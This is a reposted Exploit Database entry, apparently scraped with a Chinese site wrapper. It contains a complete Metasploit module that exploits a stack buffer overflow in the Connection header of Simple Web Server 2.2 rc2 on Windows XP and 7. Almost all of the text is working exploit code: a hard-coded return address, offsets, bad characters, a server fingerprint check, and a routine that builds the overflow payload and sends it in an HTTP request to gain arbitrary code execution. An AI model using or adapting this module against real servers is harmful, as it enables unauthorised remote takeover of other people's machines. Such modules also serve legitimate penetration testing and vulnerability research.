Simple Web Server – Connection Header Buffer Overflow (Metasploit)

• Exploit Database
• 157 阅读

• 作者： Metasploit
  日期： 2012-07-23
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/20028/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97

  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }   include Msf::Exploit::Remote::HttpClient   def initialize(info={}) super(update_info(info, &apos;Name&apos;=> "Simple Web Server Connection Header Buffer Overflow", &apos;Description&apos; => %q{ This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string data in the Connection Header to causes an overflow on the stack when function vsprintf() is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3. }, &apos;License&apos; => MSF_LICENSE, &apos;Author&apos;=> [ &apos;mr.pr0n&apos;, # Vulnerability Discovery and PoC &apos;juan&apos; # Metasploit module ], &apos;References&apos; => [ [&apos;EDB&apos;, &apos;19937&apos;], [&apos;URL&apos;, &apos;http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/&apos;] ], &apos;Payload&apos; => { &apos;BadChars&apos; => "\x00\x0a\x0d", &apos;Space&apos; => 2048, &apos;DisableNops&apos; => true, &apos;PrependEncoder&apos; => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000 }, &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => "process", }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1&apos;, { &apos;Ret&apos; => 0x6fcbc64b, # call edi from libstdc++-6.dll &apos;Offset&apos; => 2048, &apos;OffsetEDI&apos; => 84 } ] ], &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => "Jul 20 2012", &apos;DefaultTarget&apos;=> 0)) end   def check res = send_request_raw({&apos;uri&apos;=>&apos;/&apos;}) if res and res.headers[&apos;Server&apos;] =~ /PMSoftware\-SWS\/2\.[0-2]/ return Exploit::CheckCode::Vulnerable end   return Exploit::CheckCode::Safe end   def exploit   sploit = payload.encoded sploit << rand_text(target[&apos;Offset&apos;] - sploit.length) sploit << [target.ret].pack("V") # eip sploit << rand_text(target[&apos;OffsetEDI&apos;]) sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string   print_status("Trying target #{target.name}...")   connect   send_request_cgi({ &apos;uri&apos;=> &apos;/&apos;, &apos;version&apos;=> &apos;1.1&apos;, &apos;method&apos; => &apos;GET&apos;, &apos;connection&apos; => sploit })   disconnect   end end